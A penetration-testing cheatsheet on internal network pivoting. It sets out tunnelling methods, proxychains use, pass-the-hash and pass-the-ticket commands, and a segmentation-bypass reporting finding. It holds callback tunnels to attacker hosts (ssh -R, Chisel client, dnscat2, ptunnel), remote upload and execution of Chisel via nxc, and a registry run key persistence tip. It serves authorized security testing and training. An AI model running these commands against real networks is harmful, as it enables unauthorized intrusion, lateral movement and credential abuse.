🛡️ Methodology Checklist
- Identify pivot host: dual-homed, domain-joined bridging two segments
- Choose method: SSH -D (Linux+SSH) / Chisel (Windows pivot) / MSF autoroute (existing session)
- Verify tunnel:
netstat -lnpt | grep [SOCKS_PORT] - Configure Proxychains:
socks5 127.0.0.1 [SOCKS_PORT]in /etc/proxychains.conf - Validate connectivity:
proxychains4 -q curl http://[INTERNAL_IP] - Pass-the-Hash / PtT across tunnel to internal targets
- Clean up all tunnel processes and relay processes on exit
🎯 Operational Context
Use when: Internal network pivoting required — master reference for all tunneling and pivoting methods organized by scenario. Think Dumber First: Identify: what OS is the pivot? What tools are available? What protocol is egress? Then select the appropriate section of this cheatsheet. Match the tool to the scenario, not the scenario to a preferred tool. Skip when: N/A — master reference document.
⚡ Tactical Cheatsheet
SSH Tunneling
| Command | Tactical Outcome |
|---|---|
ssh -D 9050 [USER]@[PIVOT_IP] | Dynamic SOCKS proxy on port 9050 |
ssh -L [LPORT]:[INTERNAL_IP]:[RPORT] [USER]@[PIVOT_IP] | Local port forward (single service) |
ssh -R [RPORT]:localhost:[LPORT] [USER]@[ATTACKER_IP] | Remote tunnel (pivot calls back) |
ssh -N -f -D 9050 [USER]@[PIVOT_IP] | Background silent SOCKS proxy |
ss -tlnp | grep 9050 | Verify SOCKS listener |
Chisel (Reverse SOCKS)
| Command | Tactical Outcome |
|---|---|
./chisel server --reverse | Attacker: start Chisel server (listens :8080) |
nxc smb [PIVOT] -u [USER] -p [PASS] --put-file ./chisel.exe \\Windows\\Temp\\chisel.exe | Upload Chisel to Windows pivot |
nxc smb [PIVOT] -u [USER] -p [PASS] -x "C:\Windows\Temp\chisel.exe client [LHOST]:8080 R:socks" | Pivot connects back → SOCKS on attacker :1080 |
netstat -lnpt | grep 1080 | Verify SOCKS tunnel is active |
nxc smb [PIVOT] -u [USER] -p [PASS] -X "Stop-Process -Name chisel -Force" | Kill Chisel on pivot (cleanup) |
Meterpreter Autoroute
| Command | Tactical Outcome |
|---|---|
run post/multi/manage/autoroute SUBNET=[INTERNAL_NET] NETMASK=255.255.255.0 | Add route through Meterpreter session |
use auxiliary/server/socks_proxy; set SRVPORT 1080; set VERSION 5; run | Start SOCKS5 proxy in MSF |
portfwd add -l [LPORT] -p [RPORT] -r [INTERNAL_IP] | Single port forward via Meterpreter |
run post/multi/gather/arp_scanner RHOSTS=[INTERNAL_NET]/24 | Internal ARP discovery |
Socat Relay
| Command | Tactical Outcome |
|---|---|
socat TCP-LISTEN:[PORT],fork TCP:[DEST_IP]:[DEST_PORT] | TCP relay on pivot host |
socat UDP-LISTEN:[PORT],fork UDP:[DEST_IP]:[DEST_PORT] | UDP relay |
Proxychains Usage
| Command | Tactical Outcome |
|---|---|
proxychains4 -q nxc smb [INTERNAL_IP] -u [USER] -p [PASS] --shares | NXC through SOCKS tunnel |
proxychains4 -q nmap -sT -Pn -p 22,80,445,3389 [INTERNAL_IP] | Nmap through tunnel (TCP only) |
proxychains4 -q impacket-psexec [DOMAIN]/[USER]@[INTERNAL_IP] -hashes :[HASH] | Impacket PtH through tunnel |
proxychains4 -q evil-winrm -i [INTERNAL_IP] -u [USER] -p [PASS] | WinRM through tunnel |
proxychains4 -q ssh [USER]@[INTERNAL_IP] | SSH hop through tunnel |
Pass-the-Hash / Pass-the-Ticket
| Command | Tactical Outcome |
|---|---|
nxc smb [SUBNET]/24 -u [USER] -H [NTLM_HASH] --local-auth | PtH subnet sweep |
impacket-psexec [DOMAIN]/[USER]@[TARGET] -hashes :[NTLM_HASH] | PtH → SYSTEM shell |
evil-winrm -i [TARGET] -u [USER] -H [NTLM_HASH] | PtH → WinRM shell |
export KRB5CCNAME=/path/to/ticket.ccache; impacket-psexec -k -no-pass [DOMAIN]/[USER]@[TARGET] | Pass-the-Ticket (Linux) |
Rubeus.exe ptt /ticket:[BASE64]; klist | Pass-the-Ticket (Windows) |
netsh Portproxy
| Command | Tactical Outcome |
|---|---|
netsh interface portproxy add v4tov4 localport=[LPORT] connectaddress=[DEST] connectport=[DPORT] | Windows port proxy |
netsh interface portproxy show all | List active proxies |
netsh interface portproxy delete v4tov4 localport=[LPORT] | Remove proxy |
Protocol Tunneling
| Command | Tactical Outcome |
|---|---|
dnscat2 --dns server=[ATTACKER],port=53,domain=[DOMAIN] | DNS tunnel client on pivot |
ptunnel -p [ATTACKER] -lp [LPORT] -da [INTERNAL_IP] -dp [DPORT] | ICMP tunnel |
python client.py --server-ip [ATTACKER] --server-port 9999 | rpivot HTTP tunnel client |
🔬 Deep Dive & Workflow
Tunnel Method Decision Matrix
Pivot OS | Tool Available | Best Method
-------------|---------------|-----------------------------
Linux | SSH access | ssh -D 9050 (dynamic SOCKS)
Windows | No SSH | Chisel reverse SOCKS
Any | MSF session | autoroute + socks_proxy
Windows | No binaries | netsh interface portproxy
Any | DNS only egress| dnscat2
Any | ICMP only | ptunnel
Proxychains Config Check
# Verify /etc/proxychains.conf
grep -A5 "\[ProxyList\]" /etc/proxychains.conf
# Must show: socks5 127.0.0.1 [SOCKS_PORT]
# NOT socks4 — many tools fail with socks4
# Quick fix if wrong:
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.confFull Chisel Pivot Workflow
# ATTACKER SETUP
wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz -q
gunzip chisel_linux.gz && chmod +x chisel_linux
wget .../chisel_1.7.7_windows_amd64.gz -q && gunzip chisel_windows.gz
./chisel_linux server --reverse # listens on :8080
# UPLOAD + CONNECT (via NXC)
nxc smb [PIVOT] -u [USER] -p [PASS] --put-file ./chisel_windows.exe \\Windows\\Temp\\chisel.exe
nxc smb [PIVOT] -u [USER] -p [PASS] -x "C:\Windows\Temp\chisel.exe client [LHOST]:8080 R:socks"
# VERIFY + USE
netstat -lnpt | grep 1080 # should show 127.0.0.1:1080 LISTEN
proxychains4 -q nxc smb [INTERNAL] -u [USER] -p [PASS] --shares
# CLEANUP
nxc smb [PIVOT] -u [USER] -p [PASS] -X "Stop-Process -Name chisel -Force"🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Tunnel established but traffic not routing | Route missing | Verify route: proxychains4 curl http://[INTERNAL_IP]; add route if needed |
| Proxychains config stale | Old SOCKS port in config | Always verify /etc/proxychains.conf matches current tunnel port before use |
| Multiple pivots needed | Two-hop scenario | Chain: SSH -D through first pivot → proxychains SSH -D through second → proxychains4 tools on attack box |
| Pivot host rebooted | Lost tunnel | Re-establish in same order; consider cron job or registry run key to auto-restart tunnel agent |
| VPN drops mid-pivot | HTB infrastructure | Re-establish VPN first; tunnels route through VPN; then re-establish tunnel session |
📝 Reporting Trigger
Finding Title: Network Segmentation Bypassed via Multi-Hop Pivot Chain Impact: Chained pivot through multiple compromised hosts reaches target segments separated by multiple network boundaries, demonstrating that network segmentation is ineffective without complementary controls on individual hosts. Root Cause: Network segmentation implemented without host-level controls preventing compromised hosts from bridging security zones. Recommendation: Implement zero-trust network architecture. Add host-based firewall rules restricting inter-segment connectivity regardless of network-level controls. Monitor for proxy traffic patterns on all internal hosts.